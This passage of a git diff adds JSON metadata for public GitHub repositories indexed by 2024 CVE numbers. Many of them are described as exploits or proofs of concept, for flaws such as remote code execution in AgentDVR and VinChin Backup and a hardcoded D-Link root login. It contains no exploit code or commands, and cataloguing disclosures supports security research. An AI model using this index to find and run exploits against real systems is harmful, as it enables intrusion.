"2024-12-31T07:44:51Z", + "pushed_at": "2024-07-16T23:22:14Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "ctf-challenges", + "exploit", + "pentesting", + "proof-of-concept", + "python", + "redteaming", + "vmware", + "vmware-vcenter", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 40, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 830366409, + "name": "CVE-2024-22274-RCE", + "full_name": "Mustafa1986\/CVE-2024-22274-RCE", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2024-22274-RCE", + "description": null, + "fork": false, + "created_at": "2024-07-18T06:18:57Z", + "updated_at": "2024-07-18T10:12:25Z", + "pushed_at": "2024-07-18T10:12:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22275.json b/2024/CVE-2024-22275.json new file mode 100644 index 0000000000..055a836271 --- /dev/null +++ b/2024/CVE-2024-22275.json @@ -0,0 +1,40 @@ +[ + { + "id": 825084431, + "name": "CVE-2024-22275", + "full_name": "mbadanoiu\/CVE-2024-22275", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-22275", + "description": "CVE-2024-22275: Partial File Read in VMware vCenter Server", + "fork": false, + "created_at": "2024-07-06T18:14:28Z", + "updated_at": "2024-07-11T03:00:33Z", + "pushed_at": "2024-07-06T18:24:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2024-22275", + "cves", + "file-read" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22369.json b/2024/CVE-2024-22369.json new file mode 100644 index 0000000000..4a0482ca69 --- /dev/null +++ b/2024/CVE-2024-22369.json @@ -0,0 +1,33 @@ +[ + { + "id": 741418632, + "name": "CVE-2024-22369", + "full_name": "oscerd\/CVE-2024-22369", + "owner": { + "login": "oscerd", + "id": 5106647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5106647?v=4", + "html_url": "https:\/\/github.com\/oscerd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oscerd\/CVE-2024-22369", + "description": "CVE-2024-22369 Reproducer", + "fork": false, + "created_at": "2024-01-10T11:01:59Z", + "updated_at": "2024-07-31T01:23:49Z", + "pushed_at": "2024-02-20T17:48:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22393.json b/2024/CVE-2024-22393.json new file mode 100644 index 0000000000..20feda044d --- /dev/null +++ b/2024/CVE-2024-22393.json @@ -0,0 +1,39 @@ +[ + { + "id": 769052536, + "name": "CVE-2024-22393", + "full_name": "omranisecurity\/CVE-2024-22393", + "owner": { + "login": "omranisecurity", + "id": 38619429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38619429?v=4", + "html_url": "https:\/\/github.com\/omranisecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omranisecurity\/CVE-2024-22393", + "description": "Exploit for CVE-2024-22393 Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.", + "fork": false, + "created_at": "2024-03-08T08:45:12Z", + "updated_at": "2024-05-30T13:17:54Z", + "pushed_at": "2024-05-12T07:42:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "answer", + "apache", + "cve-2024-22393", + "exploit", + "exploit-cve-2024-22393" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22411.json b/2024/CVE-2024-22411.json new file mode 100644 index 0000000000..817b65f40b --- /dev/null +++ b/2024/CVE-2024-22411.json @@ -0,0 +1,33 @@ +[ + { + "id": 745408511, + "name": "avo-CVE-2024-22411", + "full_name": "tamaloa\/avo-CVE-2024-22411", + "owner": { + "login": "tamaloa", + "id": 118779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118779?v=4", + "html_url": "https:\/\/github.com\/tamaloa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamaloa\/avo-CVE-2024-22411", + "description": null, + "fork": false, + "created_at": "2024-01-19T09:19:52Z", + "updated_at": "2024-01-19T09:22:19Z", + "pushed_at": "2024-01-19T09:27:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22416.json b/2024/CVE-2024-22416.json new file mode 100644 index 0000000000..42316eb304 --- /dev/null +++ b/2024/CVE-2024-22416.json @@ -0,0 +1,33 @@ +[ + { + "id": 744906613, + "name": "ensimag-secu3a-cve-2024-22416", + "full_name": "mindstorm38\/ensimag-secu3a-cve-2024-22416", + "owner": { + "login": "mindstorm38", + "id": 17071361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17071361?v=4", + "html_url": "https:\/\/github.com\/mindstorm38", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mindstorm38\/ensimag-secu3a-cve-2024-22416", + "description": "CVE-2024-22416 exploit experiments", + "fork": false, + "created_at": "2024-01-18T08:49:07Z", + "updated_at": "2024-01-19T13:14:54Z", + "pushed_at": "2024-01-19T13:22:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2242.json b/2024/CVE-2024-2242.json new file mode 100644 index 0000000000..ebe69afe42 --- /dev/null +++ b/2024/CVE-2024-2242.json @@ -0,0 +1,33 @@ +[ + { + "id": 888883677, + "name": "CVE-2024-2242", + "full_name": "RandomRobbieBF\/CVE-2024-2242", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-2242", + "description": "Contact Form 7 <= 5.9 - Reflected Cross-Site Scripting", + "fork": false, + "created_at": "2024-11-15T07:32:31Z", + "updated_at": "2024-11-15T07:34:53Z", + "pushed_at": "2024-11-15T07:34:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22514.json b/2024/CVE-2024-22514.json new file mode 100644 index 0000000000..7dc6d5f3ac --- /dev/null +++ b/2024/CVE-2024-22514.json @@ -0,0 +1,33 @@ +[ + { + "id": 749163366, + "name": "CVE-2024-22514-Remote-Code-Execution", + "full_name": "Orange-418\/CVE-2024-22514-Remote-Code-Execution", + "owner": { + "login": "Orange-418", + "id": 46978010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4", + "html_url": "https:\/\/github.com\/Orange-418", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Orange-418\/CVE-2024-22514-Remote-Code-Execution", + "description": null, + "fork": false, + "created_at": "2024-01-27T19:04:56Z", + "updated_at": "2024-01-27T19:04:56Z", + "pushed_at": "2024-02-07T00:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22515.json b/2024/CVE-2024-22515.json new file mode 100644 index 0000000000..283a787f31 --- /dev/null +++ b/2024/CVE-2024-22515.json @@ -0,0 +1,64 @@ +[ + { + "id": 749102873, + "name": "AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution", + "full_name": "Orange-418\/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution", + "owner": { + "login": "Orange-418", + "id": 46978010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4", + "html_url": "https:\/\/github.com\/Orange-418", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Orange-418\/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution", + "description": "CVE-2024-22515 arbitrary file upload and CVE-2024-22514 remote code execution for AgentDVR 5.1.6.0 (Authenticated)", + "fork": false, + "created_at": "2024-01-27T15:36:05Z", + "updated_at": "2024-02-09T20:03:09Z", + "pushed_at": "2024-03-15T03:19:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749159831, + "name": "CVE-2024-22515-File-Upload-Vulnerability", + "full_name": "Orange-418\/CVE-2024-22515-File-Upload-Vulnerability", + "owner": { + "login": "Orange-418", + "id": 46978010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4", + "html_url": "https:\/\/github.com\/Orange-418", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Orange-418\/CVE-2024-22515-File-Upload-Vulnerability", + "description": null, + "fork": false, + "created_at": "2024-01-27T18:51:26Z", + "updated_at": "2024-01-27T18:51:26Z", + "pushed_at": "2024-02-07T00:09:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22526.json b/2024/CVE-2024-22526.json new file mode 100644 index 0000000000..9817c75e59 --- /dev/null +++ b/2024/CVE-2024-22526.json @@ -0,0 +1,33 @@ +[ + { + "id": 845358398, + "name": "CVE-2024-22526", + "full_name": "200101WhoAmI\/CVE-2024-22526", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-22526", + "description": "bandi view", + "fork": false, + "created_at": "2024-08-21T05:11:26Z", + "updated_at": "2024-08-21T05:12:04Z", + "pushed_at": "2024-08-21T05:12:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22532.json b/2024/CVE-2024-22532.json new file mode 100644 index 0000000000..a7ac610a47 --- /dev/null +++ b/2024/CVE-2024-22532.json @@ -0,0 +1,33 @@ +[ + { + "id": 761709560, + "name": "CVE-2024-22532", + "full_name": "pwndorei\/CVE-2024-22532", + "owner": { + "login": "pwndorei", + "id": 96749184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4", + "html_url": "https:\/\/github.com\/pwndorei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-22532", + "description": null, + "fork": false, + "created_at": "2024-02-22T10:44:38Z", + "updated_at": "2024-02-22T10:44:38Z", + "pushed_at": "2024-02-23T07:26:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22534.json b/2024/CVE-2024-22534.json new file mode 100644 index 0000000000..391768f6cf --- /dev/null +++ b/2024/CVE-2024-22534.json @@ -0,0 +1,33 @@ +[ + { + "id": 748333405, + "name": "CVE-2024-22534", + "full_name": "austino2000\/CVE-2024-22534", + "owner": { + "login": "austino2000", + "id": 99389401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99389401?v=4", + "html_url": "https:\/\/github.com\/austino2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/austino2000\/CVE-2024-22534", + "description": null, + "fork": false, + "created_at": "2024-01-25T18:57:34Z", + "updated_at": "2024-01-25T18:57:35Z", + "pushed_at": "2024-01-25T19:06:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2257.json b/2024/CVE-2024-2257.json new file mode 100644 index 0000000000..8522846fa1 --- /dev/null +++ b/2024/CVE-2024-2257.json @@ -0,0 +1,33 @@ +[ + { + "id": 816772228, + "name": "Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257", + "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257", + "description": null, + "fork": false, + "created_at": "2024-06-18T11:27:57Z", + "updated_at": "2024-06-18T11:28:00Z", + "pushed_at": "2024-06-18T11:27:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22640.json b/2024/CVE-2024-22640.json new file mode 100644 index 0000000000..73be4171db --- /dev/null +++ b/2024/CVE-2024-22640.json @@ -0,0 +1,33 @@ +[ + { + "id": 780492523, + "name": "CVE-2024-22640", + "full_name": "zunak\/CVE-2024-22640", + "owner": { + "login": "zunak", + "id": 14941490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4", + "html_url": "https:\/\/github.com\/zunak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zunak\/CVE-2024-22640", + "description": null, + "fork": false, + "created_at": "2024-04-01T15:43:07Z", + "updated_at": "2024-04-16T17:19:46Z", + "pushed_at": "2024-04-01T16:23:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22641.json b/2024/CVE-2024-22641.json new file mode 100644 index 0000000000..7700461c9a --- /dev/null +++ b/2024/CVE-2024-22641.json @@ -0,0 +1,33 @@ +[ + { + "id": 780504370, + "name": "CVE-2024-22641", + "full_name": "zunak\/CVE-2024-22641", + "owner": { + "login": "zunak", + "id": 14941490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4", + "html_url": "https:\/\/github.com\/zunak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zunak\/CVE-2024-22641", + "description": null, + "fork": false, + "created_at": "2024-04-01T16:11:28Z", + "updated_at": "2024-07-21T11:59:57Z", + "pushed_at": "2024-04-01T16:13:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22734.json b/2024/CVE-2024-22734.json new file mode 100644 index 0000000000..2c2f90bbac --- /dev/null +++ b/2024/CVE-2024-22734.json @@ -0,0 +1,33 @@ +[ + { + "id": 896950815, + "name": "CVE-2024-22734", + "full_name": "securekomodo\/CVE-2024-22734", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/CVE-2024-22734", + "description": "Exploit POC for CVE-2024-22734 affecting AMCS Trux Software", + "fork": false, + "created_at": "2024-12-01T17:47:16Z", + "updated_at": "2024-12-10T05:31:10Z", + "pushed_at": "2024-12-01T17:48:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22752.json b/2024/CVE-2024-22752.json new file mode 100644 index 0000000000..2b3ade9e04 --- /dev/null +++ b/2024/CVE-2024-22752.json @@ -0,0 +1,33 @@ +[ + { + "id": 767442265, + "name": "CVE-2024-22752", + "full_name": "hacker625\/CVE-2024-22752", + "owner": { + "login": "hacker625", + "id": 32318573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32318573?v=4", + "html_url": "https:\/\/github.com\/hacker625", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacker625\/CVE-2024-22752", + "description": "EaseUS MobiMover 6.0.5 Build 21620 - Insecure Files and Folders Permissions", + "fork": false, + "created_at": "2024-03-05T09:54:00Z", + "updated_at": "2024-03-06T07:18:17Z", + "pushed_at": "2024-03-05T10:26:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22774.json b/2024/CVE-2024-22774.json new file mode 100644 index 0000000000..f88f70c7c3 --- /dev/null +++ b/2024/CVE-2024-22774.json @@ -0,0 +1,33 @@ +[ + { + "id": 776665274, + "name": "CVE-2024-22774", + "full_name": "Gray-0men\/CVE-2024-22774", + "owner": { + "login": "Gray-0men", + "id": 39830524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39830524?v=4", + "html_url": "https:\/\/github.com\/Gray-0men", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gray-0men\/CVE-2024-22774", + "description": "Panoramic Dental Imaging software Stealthy Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2024-03-24T05:59:57Z", + "updated_at": "2024-05-16T20:52:09Z", + "pushed_at": "2024-05-16T20:52:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22853.json b/2024/CVE-2024-22853.json new file mode 100644 index 0000000000..ea557f9292 --- /dev/null +++ b/2024/CVE-2024-22853.json @@ -0,0 +1,33 @@ +[ + { + "id": 821748358, + "name": "CVE-2024-22853", + "full_name": "FaLLenSKiLL1\/CVE-2024-22853", + "owner": { + "login": "FaLLenSKiLL1", + "id": 43922662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43922662?v=4", + "html_url": "https:\/\/github.com\/FaLLenSKiLL1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FaLLenSKiLL1\/CVE-2024-22853", + "description": "D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.", + "fork": false, + "created_at": "2024-06-29T10:21:11Z", + "updated_at": "2024-06-29T10:26:52Z", + "pushed_at": "2024-06-29T10:26:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22867.json b/2024/CVE-2024-22867.json new file mode 100644 index 0000000000..2f45ca0ad6 --- /dev/null +++ b/2024/CVE-2024-22867.json @@ -0,0 +1,33 @@ +[ + { + "id": 755770647, + "name": "CVE-2024-22867", + "full_name": "brandon-t-elliott\/CVE-2024-22867", + "owner": { + "login": "brandon-t-elliott", + "id": 126433368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126433368?v=4", + "html_url": "https:\/\/github.com\/brandon-t-elliott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brandon-t-elliott\/CVE-2024-22867", + "description": null, + "fork": false, + "created_at": "2024-02-11T01:52:52Z", + "updated_at": "2024-02-11T01:52:52Z", + "pushed_at": "2024-02-11T01:52:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22889.json b/2024/CVE-2024-22889.json new file mode 100644 index 0000000000..da552b9237 --- /dev/null +++ b/2024/CVE-2024-22889.json @@ -0,0 +1,33 @@ +[ + { + "id": 748125203, + "name": "CVE-2024-22889-Plone-v6.0.9", + "full_name": "shenhav12\/CVE-2024-22889-Plone-v6.0.9", + "owner": { + "login": "shenhav12", + "id": 93703363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4", + "html_url": "https:\/\/github.com\/shenhav12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-22889-Plone-v6.0.9", + "description": null, + "fork": false, + "created_at": "2024-01-25T10:26:29Z", + "updated_at": "2024-01-25T10:26:29Z", + "pushed_at": "2024-01-25T10:50:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22890.json b/2024/CVE-2024-22890.json new file mode 100644 index 0000000000..8671007bb0 --- /dev/null +++ b/2024/CVE-2024-22890.json @@ -0,0 +1,33 @@ +[ + { + "id": 742168455, + "name": "CVE-2024-22890", + "full_name": "BurakSevben\/CVE-2024-22890", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-22890", + "description": null, + "fork": false, + "created_at": "2024-01-11T22:30:50Z", + "updated_at": "2024-01-30T21:51:15Z", + "pushed_at": "2024-01-31T00:26:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22891.json b/2024/CVE-2024-22891.json new file mode 100644 index 0000000000..6f64e176d0 --- /dev/null +++ b/2024/CVE-2024-22891.json @@ -0,0 +1,33 @@ +[ + { + "id": 853174224, + "name": "CVE-2024-22891", + "full_name": "EQSTLab\/CVE-2024-22891", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-22891", + "description": "PoC for CVE-2024-22891", + "fork": false, + "created_at": "2024-09-06T06:13:39Z", + "updated_at": "2024-09-06T06:14:03Z", + "pushed_at": "2024-09-06T06:14:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22894.json b/2024/CVE-2024-22894.json new file mode 100644 index 0000000000..416dc6c842 --- /dev/null +++ b/2024/CVE-2024-22894.json @@ -0,0 +1,33 @@ +[ + { + "id": 749150559, + "name": "CVE-2024-22894", + "full_name": "Jaarden\/CVE-2024-22894", + "owner": { + "login": "Jaarden", + "id": 78766934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78766934?v=4", + "html_url": "https:\/\/github.com\/Jaarden", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaarden\/CVE-2024-22894", + "description": null, + "fork": false, + "created_at": "2024-01-27T18:17:48Z", + "updated_at": "2024-11-12T21:00:30Z", + "pushed_at": "2024-05-29T11:39:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22899.json b/2024/CVE-2024-22899.json new file mode 100644 index 0000000000..5a1a22c186 --- /dev/null +++ b/2024/CVE-2024-22899.json @@ -0,0 +1,53 @@ +[ + { + "id": 714997705, + "name": "CVE-2024-22899-to-22903-ExploitChain", + "full_name": "Chocapikk\/CVE-2024-22899-to-22903-ExploitChain", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-22899-to-22903-ExploitChain", + "description": "Comprehensive Exploit Chain for Multiple Vulnerabilities in VinChin Backup & Recovery <= 7.2", + "fork": false, + "created_at": "2023-11-06T09:24:15Z", + "updated_at": "2024-08-12T20:33:00Z", + "pushed_at": "2024-02-01T17:24:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authenticated-rce", + "cve-2024-22899", + "cve-2024-22900", + "cve-2024-22901", + "cve-2024-22902", + "cve-2024-22903", + "cybersecurity", + "ethical-hacking", + "exploit-chain", + "exploit-development", + "hacking-tools", + "infosec", + "open-source-security", + "penetration-testing", + "reverse-engineering", + "security-research", + "security-vulnerability", + "vinchin-exploit", + "vulnerability-research" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22909.json b/2024/CVE-2024-22909.json new file mode 100644 index 0000000000..2bf84d50d6 --- /dev/null +++ b/2024/CVE-2024-22909.json @@ -0,0 +1,33 @@ +[ + { + "id": 742200216, + "name": "CVE-2024-22909", + "full_name": "BurakSevben\/CVE-2024-22909", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-22909", + "description": null, + "fork": false, + "created_at": "2024-01-12T00:40:29Z", + "updated_at": "2024-01-30T22:29:11Z", + "pushed_at": "2024-01-31T00:27:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + 